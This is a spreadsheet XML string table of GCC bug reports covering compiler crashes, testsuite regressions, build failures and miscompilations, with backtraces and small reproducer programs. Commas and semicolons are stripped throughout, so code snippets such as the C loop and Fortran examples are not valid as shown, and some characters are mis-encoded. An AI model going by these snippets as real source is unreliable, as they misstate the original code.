Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  ASan internal:           fe
==20809==ABORTING</t>
  </si>
  <si>
    <t>m.zakirov</t>
  </si>
  <si>
    <t>GCC-61822</t>
  </si>
  <si>
    <t>gcc.dg/vect/vect-cond-reduc-1.c FAILs</t>
  </si>
  <si>
    <t>Between 20140704 (r212295) and 20140711 (r212451) the gcc.dg/vect/vect-cond-reduc-1.c test started to FAIL on Solaris/SPARC (both 32 and 64-bit):
FAIL: gcc.dg/vect/vect-cond-reduc-1.c scan-tree-dump-times vect vectorized 1 loops 1
FAIL: gcc.dg/vect/vect-cond-reduc-1.c -flto -ffat-lto-objects  scan-tree-dump-times vect vectorized 1 loops 1
I'm attaching the 32-bit vect dump.
Btw. there are two typos in the last ChangeLog entry:
2014-07-10  Yuri Rumyantsev  
	PR tree-optimization/61742
	* gcc.dg/torture/pr61742.c: New test.
	* gcc.gg/vect/cond-reduc-1.c: Rename it to vect-cond-reduc-1.c
	* gcc.gg/vect/cond-reduc-2.c: Rename it to vect-cond-reduc-2.c
This should be gcc.dg both times.
  Rainer</t>
  </si>
  <si>
    <t>GCC-54610</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: gcc.dg/tree-ssa/forwprop-22.c (internal compiler error) on x86 AVX targets</t>
  </si>
  <si>
    <t>Recent regression:
~/gcc-build-fast/gcc/cc1 -O -mavx forwprop-22.c 
 f
Analyzing compilation unit
Performing interprocedural optimizations
forwprop-22.c: In function â€˜fâ€™:
forwprop-22.c:14:1: error: vectors with different element number found in vector permute expression
 }
 ^
vec
vec
vec
vector(4) long long unsigned int
t1_7 = VEC_PERM_EXPR &gt;&gt; }&gt;
forwprop-22.c:14:1: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  internal_error (gmsgid=0xe0d7f8 verify_gimple failed) at ../../gcc-svn/trunk/gcc/diagnostic.c:951
#1  0x00000000008d442d in verify_gimple_in_cfg (fn=0x7ffff19ac140) at ../../gcc-svn/trunk/gcc/tree-cfg.c:4659
#2  0x0000000000812f45 in execute_function_todo (data=) at ../../gcc-svn/trunk/gcc/passes.c:1801
#3  0x000000000081393e in execute_todo (flags=2054) at ../../gcc-svn/trunk/gcc/passes.c:1834
#4  0x000000000081644e in execute_one_pass (pass=pass@entry=0x13380c0) at ../../gcc-svn/trunk/gcc/passes.c:2180
#5  0x00000000008167d5 in execute_pass_list (pass=0x13380c0) at ../../gcc-svn/trunk/gcc/passes.c:2212
#6  0x00000000008167e7 in execute_pass_list (pass=0x1335d80) at ../../gcc-svn/trunk/gcc/passes.c:2213
#7  0x000000000081593d in do_per_function_toporder (callback=callback@entry=0x8167c0  data=0x1337a60)
    at ../../gcc-svn/trunk/gcc/passes.c:1704
#8  0x0000000000816d76 in execute_ipa_pass_list (pass=0x1335d20) at ../../gcc-svn/trunk/gcc/passes.c:2523
#9  0x000000000061dbb0 in ipa_passes () at ../../gcc-svn/trunk/gcc/cgraphunit.c:1838
#10 compile () at ../../gcc-svn/trunk/gcc/cgraphunit.c:1961</t>
  </si>
  <si>
    <t>GCC-18321</t>
  </si>
  <si>
    <t>[3.3/3.4/4.0 regression] mmix-knuth-mmixware testsuite failure: gcc.c-torture/compile/20031023-4.c -O0 -O1</t>
  </si>
  <si>
    <t>Public note of failure (apparently since test case was added):
With LAST_UPDATED Sat Nov  6 19:25:03 GMT 2004
gcc/testsuite/gcc.c-torture/compile/20031023-1.c: In function 'bar':
gcc/testsuite/gcc.c-torture/compile/20031023-1.c:38: internal compiler error: in
change_address_1 at emit-rtl.c:1821</t>
  </si>
  <si>
    <t>GCC-693</t>
  </si>
  <si>
    <t>Optimizer ignores possible zero result of an unsigned multiply</t>
  </si>
  <si>
    <t>In the attached c file.  func2 works correctly and is included only for comparison.  In func1 the (product &gt; 0) check assumed to always be true.  This is wrong since 
product can be zero or it can overflow and go negative.
A couple of related notes:  
The fact that the compare with 200 is done with both a subq and then a cmp is a bit bogus (though it should work).
On some some Coldfire platforms a cmp immediately followed by a conditional branch the branch will use the old value of the condition code register. This also occurs in the sample code.  I'm waiting to hear from the correct people here at Mot as to whether or not this is an issue with the 5200 (which I targeted in the compile).
Release:
2.95.2
Environment:
m68k
How-To-Repeat:
Compile using the command:
68k_gcc -S -m5200 -O2 tmp.c -o tmp.s
note that the jump to .L3 (the else case) is based only on whether or not product is &lt;= 200.</t>
  </si>
  <si>
    <t>travis.moulton</t>
  </si>
  <si>
    <t>GCC-9154</t>
  </si>
  <si>
    <t>[3.4 regression] poor error message for &gt;&gt; vs. &gt; &gt; for nested template args</t>
  </si>
  <si>
    <t>c++error.ii 
-----------------------------
template  
class a {
}
int main() {
   a&gt; blah
}
-----------------------------
when compiled on mainline cvs - gives
-----------------------------
c++error.cc: In function `int main()':
c++error.cc:6: error: template argument 1 is invalid
c++error.cc:6: error: template argument 1 is invalid
c++error.cc:6: error: expected `'
------------------------------
correct - but nowhere near as nice as previosly
gcc version 3.2.2 20021212 (Debian prerelease) gives
------------------------------
c++error.cc: In function `int main()':
c++error.cc:6: `&gt;&gt;' should be `&gt; &gt;' in template class name
------------------------------
Release:
gcc version 3.4 20030102 (experimental)
How-To-Repeat:
g++ -c c++error.ii</t>
  </si>
  <si>
    <t>giovannibajo</t>
  </si>
  <si>
    <t>GCC-1148</t>
  </si>
  <si>
    <t>internal compiler error: program jc1</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;suspended
State-Changed-Why: I can't reproduce this problem.  Checker.java refers
    to many classes that were not included.
    Here are a couple of ideas:
    	1- Try a recent snapshot of the compiler
    	   instead of 2.95.2
    	2- Try to create a minimal test case.
    Thanks  AG
</t>
  </si>
  <si>
    <t>moonjoo</t>
  </si>
  <si>
    <t>GCC-52756</t>
  </si>
  <si>
    <t>[4.8 Regression] 255.vortex in SPEC CPU 2000 failed to build</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 185913 gave:
gcc -c -o env1.o  -fno-strict-aliasing -DSPEC_CPU2000_LP64         -O2 -ffast-math   env1.c
...
env1.c: In function 'Env_FetchObj0AttrOffset':
env1.c:1094:12: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
specmake[3]: *** [env1.o] Error 1
Revision 185825. is OK.</t>
  </si>
  <si>
    <t>GCC-55399</t>
  </si>
  <si>
    <t>pch</t>
  </si>
  <si>
    <t>pch tests fail on mips-mti-linux-gnu target</t>
  </si>
  <si>
    <t>Starting with r192715 a large number (almost all) of the pch tests started failing on the mips-mti-linux-gnu target.  I have verified that they pass using r192714.
I think the problem has something to do with when/where/if pch_cpp_save_state()
is called but I am not sure.  I noticed that done_preinclude is an uninitialized
global variable but explicitly initializing it to false did not fix the problem.
I have no idea why this would not be affecting other targets as I don't see any
MIPS specific changes in this patch but I have not seen it on other targets.
The patch that caused the regression is mostly in libcpp:
2012-10-23  Joseph Myers  
	* files.c (struct _cpp_file): Add implicit_preinclude.
	(pch_open_file): Allow a previously opened implicitly included
	file.
	(_cpp_find_file): Add implicit_preinclude argument.  Free file and
	do not call open_file_failed if implicit_preinclude.  Store
	implicit_preinclude value.
	(_cpp_stack_include _cpp_fake_include _cpp_compare_file_date):
	Update calls to _cpp_find_file.
	(_cpp_stack_include): Handle IT_DEFAULT.
	(cpp_push_default_include): New.
	* include/cpplib.h (cpp_push_default_include): Declare.
	* init.c (cpp_read_main_file): Update call to _cpp_find_file.
	* internal.h (enum include_type): Add IT_DEFAULT.
	(_cpp_find_file): Update prototype.</t>
  </si>
  <si>
    <t>GCC-9238</t>
  </si>
  <si>
    <t>make install: install-sh: not found</t>
  </si>
  <si>
    <t>make succeeds
make install fails at:
make[4]: Entering directory `/export/home/bmohler/src/gcc-3.2/gcc-3.0-sparc-32bit-obj/sparc-sun-solaris2.8/sparcv9/libstdc++-v3'
Making install in include
make[5]: Entering directory `/export/home/bmohler/src/gcc-3.2/gcc-3.0-sparc-32bit-obj/sparc-sun-solaris2.8/sparcv9/libstdc++-v3/include'
make[6]: Entering directory `/export/home/bmohler/src/gcc-3.2/gcc-3.0-sparc-32bit-obj/sparc-sun-solaris2.8/sparcv9/libstdc++-v3/include'
make[6]: Nothing to be done for `install-exec-am'.
/bin/sh ../../../../../libstdc++-v3/../mkinstalldirs /usr/local/include/c++/3.2
/bin/sh ../../../../../libstdc++-v3/../mkinstalldirs /usr/local/include/c++/3.2/./bits
for file in /export/home/bmohler/src/gcc-3.2/libstdc++-v3/include/bits/basic_ios.h /export/home/bmohler/src/gcc-3.2/libstdc++-v3/include/bits/basic_ios.tcc /export/home/bmohler/src/gcc-3.2/libstdc++-v3/include/bits/basic_string.h
...
/export/home/bmohler/src/gcc-3.2/libstdc++-v3/include/bits/valarray_meta.h  do \
  ../../../../libstdc++-v3/../install-sh -c -m 644 ${file} /usr/local/include/c++/3.2/./bits done
/bin/sh: ../../../../libstdc++-v3/../install-sh: not found
/bin/sh: ../../../../libstdc++-v3/../install-sh: not found
/bin/sh: ../../../../libstdc++-v3/../install-sh: not found
...
make[6]: *** [install-data-local] Error 1
make[6]: Leaving directory `/export/home/bmohler/src/gcc-3.2/gcc-3.0-sparc-32bit-obj/sparc-sun-solaris2.8/sparcv9/libstdc++-v3/include'
make[5]: *** [install-am] Error 2
...
Release:
gcc 3.2
Environment:
Solaris 8 (SPARC)
gcc 3.2 (languages=cc++java) being compiled with gcc 2.95.2
GNU make 3.80
How-To-Repeat:
The benavior is very consistent.</t>
  </si>
  <si>
    <t>bruce_mohler</t>
  </si>
  <si>
    <t>GCC-48089</t>
  </si>
  <si>
    <t>[C++0x] ICE on in(?)valid in constexpr constructors</t>
  </si>
  <si>
    <t>Created attachment 23635
Example showing the problem
Trying to mark a value as don't care using the gcc extension of initializing it with itself triggers an ICE in lookup_parameter_binding.</t>
  </si>
  <si>
    <t>GCC-43342</t>
  </si>
  <si>
    <t>lto1: internal compiler error: failed to reclaim unneeded function</t>
  </si>
  <si>
    <t>here's a simple lto test on object with virtual methods:
$ LANG=C make clean all CPPFLAGS=-DCRASH
rm -f *.o *.s *.ii m
g++-4.5 -Wall -g2 -O3 -DCRASH a.cpp -c -flto
g++-4.5 -Wall -g2 -O3 -DCRASH m.cpp -c -flto
g++-4.5 -Wall -g2 -O3 -DCRASH a.o m.o -o m -fwhopr --save-temps -fverbose-asm
__base_dtor /6(-1) @0x7f82e673dea0 (clone of __base_dtor /3) availability:not_available (25 after inlining) (7 after inlining) needed address_taken body externally_visible finalized
  called by: main/1
  calls:
lto1: internal compiler error: failed to reclaim unneeded function
Please submit a full bug report
with preprocessed source if appropriate.
another variant of testcase with dynamic object allocation compiles
but virtual calls aren't optimized.
$ LANG=C make clean all
rm -f *.o *.s *.ii m
g++-4.5 -Wall -g2 -O3  a.cpp -c -flto
g++-4.5 -Wall -g2 -O3  m.cpp -c -flto
g++-4.5 -Wall -g2 -O3  a.o m.o -o m -fwhopr --save-temps -fverbose-asm
m_a.wpa.s fragments:
indirect foo() call not optimized.
        movq    $_ZTV1X+16 (%rax)
        call    *_ZTV1X+32(%rip)
bar() call optimized :)
        movq    %rbp %rsi
        movl    $.LC1 %edi
        xorl    %eax %eax
        call    printf
indirect destructor call not optimized.
        movq    (%rbx) %rax
        movq    %rbx %rdi
        call    *8(%rax)</t>
  </si>
  <si>
    <t>GCC-2718</t>
  </si>
  <si>
    <t>in zlib: configure: error: can not find install-sh or install.sh in .. ./..</t>
  </si>
  <si>
    <t>During make i got this error in zlib for now a longer time
Interestingly ther seems to be two times the detect
for install.sh.
While the first one has an 
for ac_dir in $srcdir $srcdir/.. $srcdir/../.. do
The second one has only:
for ac_dir in .. $srcdir/.. do
and fails.
If i modify the second one to be equal to the first one it seems
to go. But then i have the same problem with boehm-gc
Release:
latest cvs snapshot
Environment:
i686 Suse Linux 7.1</t>
  </si>
  <si>
    <t>p.katzmann</t>
  </si>
  <si>
    <t>GCC-34017</t>
  </si>
  <si>
    <t>[4.2/4.3 Regression] ICE in lambda_loopnest_to_gcc_loopnest with -O2 -ftree-loop-linear</t>
  </si>
  <si>
    <t>Test 445.gobmk in SPEC CPU2006 fails to build on powerpc64-linux with -m64 -O2 -ftree-loop-linear due to an ICE in lambda_loopnest_to_gcc_loopnest at lambda-code.c:1840.  This test case demonstrates the problem:
extern int size
struct data2 { }
struct data1 { int origin }
static void
print (struct data1 *d1 struct data2 *d2)
{
  int m n
  int mini maxi
  int minj maxj
  int origin = d1[0].origin
  minj = size
  for (m = 0 m &lt; size m++)
    for (n = 0 n &lt; size n++)
      {
        if (d1[21 + m * 20 + n].origin != origin)
          continue
        if (m &gt; maxi)
          maxi = m
        if (n &lt; minj)
          minj = n
      }
  for (m = mini m &lt;= maxi m++)
    {
      for (n = minj n &lt;= maxj n++)
        {
        }
    }
}
void
compute (struct data1 *d1 struct data2 d2[400])
{
  print (d1 d2)
}
The failure begins with:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=114205
    r114205 | spop | 2006-05-29 16:01:16 +0000 (Mon 29 May 2006)</t>
  </si>
  <si>
    <t>spop</t>
  </si>
  <si>
    <t>janis</t>
  </si>
  <si>
    <t>GCC-54959</t>
  </si>
  <si>
    <t>current_pass == NULL during invocation of pass-&gt;gate within execute_ipa_summary_passes()</t>
  </si>
  <si>
    <t>In my gcc-python-plugin I allow users to create custom passes.
(FWIW see http://gcc-python-plugin.readthedocs.org/en/latest/passes.html#creating-new-optimization-passes for what this looks like from the user's perspective).
In particular I've been supporting a gate() method mirroring that of the underlying opt_pass.
I have a single impl_gate() handler that's shared by all such user-created passes which I then dispatch to appropriate python code.  Given that the gate() callback takes no arguments I've been looking up the relevant opt_pass* by looking at the current_pass global.
This works for GIMPLE_PASS passes but not for those of kind IPA_PASS.
Specifically within gcc-4.7.0:gcc/passes.c:
  1875	void
  1876	execute_ipa_summary_passes (struct ipa_opt_pass_d *ipa_pass)
  1877	{
  1878	  while (ipa_pass)
  1879	    {
  1880	      struct opt_pass *pass = 
  1881	
  1882	      /* Execute all of the IPA_PASSes in the list.  */
  1883	      if (ipa_pass-&gt;pass.type == IPA_PASS
&gt;&gt;1884		  &amp;&amp; (!pass-&gt;gate || pass-&gt;gate ())
  1885		  &amp;&amp; ipa_pass-&gt;generate_summary)
  1886		{
at line 1884 pass-&gt;gate() is called but current_pass is NULL so I don't see to have a way of figuring out which opt_pass* the gate() callback was called on.
Is it possible to set current_pass in this loop before calling gate()?
Alternatively all such callbacks could gain an argument passing in pass (though that would be an API change).
Hope the above makes sense</t>
  </si>
  <si>
    <t>GCC-48918</t>
  </si>
  <si>
    <t>GNAT Bug Box with Assert_Failure with einfo.adb:2661</t>
  </si>
  <si>
    <t>Created attachment 24201
Ada source triggers the GNAT Bug Box
$ gcc -c -gnat12 buffers.ads
+===========================GNAT BUG DETECTED==============================+
| 4.6.0 (i686-pc-mingw32) Assert_Failure einfo.adb:2661                    |
| Error detected at buffers.ads:3:58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Consider also -gnatd.n switch (see debug.adb).
buffers.ads
compilation abandoned</t>
  </si>
  <si>
    <t>anhvofrcaus</t>
  </si>
  <si>
    <t>GCC-895</t>
  </si>
  <si>
    <t>top of ONEWS needs to be merged into EGCS release notes</t>
  </si>
  <si>
    <t>The file gcc/NEWS starts with:
============================================================
Noteworthy changes in GCC after EGCS 1.1.
-----------------------------------------
Target specific NEWS
    RS6000/PowerPC: -mcpu=401 was added as an alias for -mcpu=403.  -mcpu=e603e
                    was added to do -mcpu=603e and -msoft-float.
    MCore: Port of gcc to Motorola's MCore 210 and 340 contributed.
============================================================
This has the following problems: (a) it gives the impression that EGCS
is something current (b) it doesn't cover GCC 2.95 (c) the items
listed there aren't in the GCC 2.95 release notes.
Release:
2.97 20001126 (experimental)
Environment:
System: Linux decomino 2.2.17 #1 Mon Sep 4 20:22:16 UTC 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-cvs/configure --prefix=/opt/gcc/snapshot --disable-shared --enable-threads=posix --with-system-zlib
How-To-Repeat:
Look in gcc/NEWS and get confused about whether it's GCC or EGCS and
whether anything's happened since EGCS 1.1.</t>
  </si>
  <si>
    <t>GCC-34702</t>
  </si>
  <si>
    <t>1.0 is not the inverse of 1.0 with -mrecip on x86</t>
  </si>
  <si>
    <t>The following test
integer :: i n
real :: x y(10)
x =1.0
n = 10
do i = 1 n
  y(i) =  1.0/x
  x = 2.0*x
end do
print * y
end
when compiled with -O -ffast-math -mrecip gives
  0.99999994      0.49999997      0.24999999      0.12499999      6.24999963E-02  3.12499981E-02  1.56249991E-02  7.81249953E-03  3.90624977E-03  1.95312488E-03
the inverse of an integer power of 2 is not an integer power of 2 with -mrecip on i686-apple-darwin9 and x86_64-unknown-linux-gnu.
Since x0*(2.0-x*x0) does not have round-off errors when x=2.0**i and x0=2.0**(-i) I assume that rcp* don't return an integer power of 2 if the input is an integer power of 2.
In addition the result of a Newton-Raphson iteration is not the same from above of from below:
real :: x y
x = 1.0
y = nearest(xx)
print * y*(2.0-x*y)
y = nearest(x-x)
print * y*(2.0-x*y)
end
gives
  1.00000000    
  0.99999994    
This result is quite unfortunate since the integer powers of 2 are the only floating point numbers having an exact inverse.  This numerical error probably not be fixed in an effective way but should probably be documented.
As a side note I stumbled on the problem while trying to run the aermod.f90 polyhedron test with -mrecip. I have been chasing a resulting bus error at execution for a while until I found the culprit as line 35369 of the subroutine NUMRISE:
      IF ( FLOAT(NNP/NP).EQ.FLOAT(NNP)/XNP ) THEN
for which the comparison fails even if NP=1 and XNP=1.0 with -mrecip. It follows that the variable NN initialized within this IF block is not initialized thus in some case leading to a variable DELN negative or bigger than 1 at line 35514 leading to an access out of bounds.  Note also that there is no point to discuss (at least with me) the way the program is written: I am well aware of the dangers of testing floating points for equality!
A way to limit this kind of problems while letting people use -mrecip if it speeds up their code could be (if possible) to use the exact division within IF expressions.</t>
  </si>
  <si>
    <t>GCC-4235</t>
  </si>
  <si>
    <t>Exception handling on AIX 4.2 does not catch</t>
  </si>
  <si>
    <t>It is not possible to catch an exception in the AIX environment.
When cxa_throw() is invoked abort() will be called as if there are no catch handlers.
If looking closer to the libgcc source you will notice that there are two calls to __register_frame_info_table_bases() in unwind-dw2-fde.c using different instances of the object_mutex declared statically in this file.
The first __register_frame_info_table_bases() is called from the file generated by collect2 and contains the correct frame information.  I can't find the origin of the second call to __register_frame_info_table_bases(). 
Anyway the calls above register the frame information in different instances of unseen_objects.
When cxa_throw() is called only the latter frame information in unseen_object is used. The first registration is never used and therefore no handler is found.
===
Reading specs from /usr/local/lib/gcc-lib/powerpc-ibm-aix4.2.0.0/3.0.1/specs
Configured with: ../gcc-3.0.1/configure --prefix=/usr/local --with-gnu-as --with-as=/usr/local/bin/as --enable-threads=aix --enable-shared
Thread model: aix
gcc version 3.0.1
 /usr/local/lib/gcc-lib/powerpc-ibm-aix4.2.0.0/3.0.1/cpp0 -lang-c++ -D__GNUG__=3 -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=1 -D_IBMR2 -D_POWER -D_AIX -D_AIX32 -D_AIX41 -D_LONG_LONG -D_IBMR2 -D_POWER -D_AIX -D_AIX32 -D_AIX41 -D_LONG_LONG -Asystem=unix -Asystem=aix -D__CHAR_UNSIGNED__ -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_ARCH_COM simple.cpp simple.ii
GNU CPP version 3.0.1 (cpplib)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/powerpc-ibm-aix4.2.0.0
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/powerpc-ibm-aix4.2.0.0/3.0.1/include
 /usr/local/powerpc-ibm-aix4.2.0.0/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/powerpc-ibm-aix4.2.0.0/3.0.1/cc1plus -fpreprocessed simple.ii -quiet -dumpbase simple.cpp -version -o simple.s
GNU CPP version 3.0.1 (cpplib)
GNU C++ version 3.0.1 (powerpc-ibm-aix4.2.0.0)
	compiled by GNU C version 2.95.3 20010315 (release).
 /usr/local/bin/as --traditional-format -u -mcom -o simple.o simple.s
 /usr/local/lib/gcc-lib/powerpc-ibm-aix4.2.0.0/3.0.1/collect2 -bpT:0x10000000 -bpD:0x20000000 -btextro -bnodelcsect /lib/crt0.o -L/usr/local/lib/gcc-lib/powerpc-ibm-aix4.2.0.0/3.0.1 -L/usr/local/lib/gcc-lib/powerpc-ibm-aix4.2.0.0/3.0.1/../../.. -lstdc++ simple.o /usr/local/lib/gcc-lib/powerpc-ibm-aix4.2.0.0/3.0.1/libgcc.a -lc /usr/local/lib/gcc-lib/powerpc-ibm-aix4.2.0.0/3.0.1/libgcc.a
It aborts also when --enable-shared is not specified with configure.
Release:
gcc version 3.0.1
Environment:
powerpc-ibm-aix4.2.0.0
How-To-Repeat:
int main(int argc char **argv)
{
  int x = 0
  try {
    throw new int
    x = 1
  } catch (int *) {
    x = 2
  }
  return x
}</t>
  </si>
  <si>
    <t>litn</t>
  </si>
  <si>
    <t>GCC-50435</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/vect/bb-slp-25.c (-flto)? scan-tree-dump-times slp basic block vectorized using SLP 1</t>
  </si>
  <si>
    <t>On x86_64-apple-darwin10 the test gcc.dg/vect/bb-slp-25.c fails (see http://gcc.gnu.org/ml/gcc-testresults/2011-09/msg01560.html ). Looking for SLP in bb-slp-25.c.115t.slp I get
189: Failed to SLP the basic block.
189: not vectorized: failed to find SLP opportunities in basic block.
18: Failed to SLP the basic block.
18: not vectorized: failed to find SLP opportunities in basic block.
41: Failed to SLP the basic block.
41: not vectorized: failed to find SLP opportunities in basic block.
48: Failed to SLP the basic block.
48: not vectorized: failed to find SLP opportunities in basic block.
indeed no basic block vectorized using SLP. However compiling the test with -ftree-vectorizer-verbose=2 returns
...
Vectorizing loop at /opt/gcc/work/gcc/testsuite/gcc.dg/vect/bb-slp-25.c:16
16: created 2 versioning for alias checks.
16: vectorizing stmts using SLP.
16: LOOP VECTORIZED.
...
I have applied r178880 on top of r178869 on powerpc-apple-darwin9 and the tests pass while I get the above results when I run them manually.</t>
  </si>
  <si>
    <t>GCC-65495</t>
  </si>
  <si>
    <t>ICE: chkp_make_addressed_object_bounds: Unexpected tree code const_decl with -fcheck-pointer-bounds -mmpx and fortran</t>
  </si>
  <si>
    <t>Created attachment 35074
reduced testcase
Compiler output:
$ gcc -fcheck-pointer-bounds -mmpx testcase.f90 
testcase.f90:2:0:
       END
 ^
internal compiler error: chkp_make_addressed_object_bounds: Unexpected tree code const_decl
0xd6d7c6 chkp_make_addressed_object_bounds
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:3384
0xd6ac4e chkp_find_bounds_1
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:3517
0xd6fae6 chkp_find_bounds
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:3555
0xd6fae6 chkp_add_bounds_to_call_stmt
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:1814
0xd6fae6 chkp_instrument_function
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:4139
0xd6fae6 chkp_execute
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:4323
0xd6fae6 execute
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:4380
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
It seems almost any fortran code triggers this ICE.
$ gcc -v                                        
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-221530-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-221530-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 5.0.0 20150320 (experimental) (GCC) 
Tested revisions:
r221530 - ICE</t>
  </si>
  <si>
    <t>GCC-34438</t>
  </si>
  <si>
    <t>gfortran not compliant w.r.t default initialization of derived type component and implicit SAVE attribute</t>
  </si>
  <si>
    <t>gfortran 4.1.x 4.2.x and 4.3.x are not compliant with the standard section 4.4
'Unlike explicit initialization default initialization does not imply that
the object has the SAVE attribute'
for the following testcase:
--- cut here ---
program main
  type myint
    integer :: bar = 0
  end type myint
  call recfunc(1)
contains
  recursive subroutine recfunc(ivalue)
    integer intent(in) :: ivalue
    type(myint) :: foo
    foo%bar = ivalue
    if (ivalue .le. 3) then
      print * recursion level ivalue value of local variable: foo%bar
      call recfunc(ivalue + 1)
      print * recursion level ivalue value of local variable: foo%bar
    endif
  end subroutine recfunc
end program main
--- cut here ---
The default initialization of the component bar leads to type(myint) ::
foo having the SAVE attribute when compiled with gfortran. But foo should
only get the SAVE attribute if it were explicitly initialized. (The constraint
in 11.3 does not hold here)
$ gfortran -Wall demo.f90  &amp;&amp; ./a.out
 recursion level           1 value of local variable:           1
 recursion level           2 value of local variable:           2
 recursion level           3 value of local variable:           3
 recursion level           3 value of local variable:           4
 recursion level           2 value of local variable:           4
 recursion level           1 value of local variable:           4
Recent version of PGI Pathscale Intel SunStudio and G95 yield instead:
 recursion level 1 value of local variable: 1
 recursion level 2 value of local variable: 2
 recursion level 3 value of local variable: 3
 recursion level 3 value of local variable: 3
 recursion level 2 value of local variable: 2
 recursion level 1 value of local variable: 1
gfortran behaves like the other compilers when the default initialization of
component bar in the type definition is removed:
  [...]
  type myint
    integer :: bar
  end type myint
  [...]
Conversely the compilers mentioned behave like gfortran if the variable foo
explicitly gets the SAVE attribute:
    [...]
    type(myint) save :: foo
    [...]
For sake of completeness:
$ gfortran -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.1.x/configure --enable-shared --enable-languages=cc++fortran --enable-threads --enable-__cxa_atexit
Thread model: posix
gcc version 4.1.3 20071211 (prerelease)
$ gfortran -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.2.x/configure --enable-shared --enable-languages=cc++fortran --enable-threads --enable-__cxa_atexit
Thread model: posix
gcc version 4.2.3 20071211 (prerelease)
$ gfortran -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.3.x/configure --enable-shared --enable-languages=cc++fortran --enable-threads --enable-__cxa_atexit
Thread model: posix
gcc version 4.3.0 20071211 (experimental) (GCC)</t>
  </si>
  <si>
    <t>sven.buijssen</t>
  </si>
  <si>
    <t>GCC-24362</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] internal compiler error: in extract_component at tree-complex.c:68</t>
  </si>
  <si>
    <t>The file
http://www.mpq.mpg.de/Theorygroup/CIRAC/people/ripoll/Tensor_diag_z.i
compiled with
g++ -Wall -pipe -fpreprocessed -g -O2 -march=pentium4 -fpreprocessed -c Tensor_diag_z2.i -o Tensor_diag_z.o
causes the compiler to break down with the following error message
/home/jlr/afs/src/mpscxx/tensor/Tensor_diag_d.cpp: In function Ã¢double __complex__ trace(const Tensor:
/home/jlr/afs/src/mpscxx/tensor/Tensor_diag_d.cpp:199: internal compiler error: in extract_component at tree-complex.c:68
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
The compiler is running on Ubuntu Breezy (5.10)</t>
  </si>
  <si>
    <t>worm</t>
  </si>
  <si>
    <t>GCC-58348</t>
  </si>
  <si>
    <t>Build fails on x86_64-unknown-linux-gnu in libvtv on ENABLE_VTABLE_VERIFY not in AM_CONDITIONAL</t>
  </si>
  <si>
    <t>Build on current git snapshot fails with the following error messages:
cd /home/ubuntu/gcc/libvtv &amp;&amp; /bin/bash /home/ubuntu/gcc/missing --run automake-1.11 --foreign
configure.ac:129: omit leading './' from config file names such as './Makefile'
configure.ac:129: remake rules might be subtly broken otherwise
testsuite/Makefile.am:42: ENABLE_VTABLE_VERIFY does not appear in AM_CONDITIONAL
make[3]: *** [/home/ubuntu/gcc/libvtv/Makefile.in] Error 1
make[3]: Leaving directory `/home2/gccobj/x86_64-unknown-linux-gnu/libvtv'</t>
  </si>
  <si>
    <t>dschroetter</t>
  </si>
  <si>
    <t>GCC-8850</t>
  </si>
  <si>
    <t>SEGV in push_local_name on invalid code</t>
  </si>
  <si>
    <t>g++ dies with a segmentation violation compiling the following (invalid) code.
$ g++ -c x.cc
x.cc:2: error: type specifier omitted for parameter
x.cc:2: error: parse error before string constant
x.cc:3: error: ISO C++ forbids declaration of `FWK_REGISTRY_IMPL' with no type
x.cc: In function `int FWK_REGISTRY_IMPL(...)':
x.cc:3: error: no `SpyExample::~SpyExample()' member function declared in class    `SpyExample'
x.cc: In destructor `SpyExample::~SpyExample()':
x.cc:5: error: `DataStore' undeclared (first use this function)
x.cc:5: error: (Each undeclared identifier is reported only once for each 
   function it appears in.)
x.cc:5: error: `ds' undeclared (first use this function)
x.cc:6: error: variable or field `ready' declared void
x.cc:6: error: `int SpyExample::ready' is not a static member of `class 
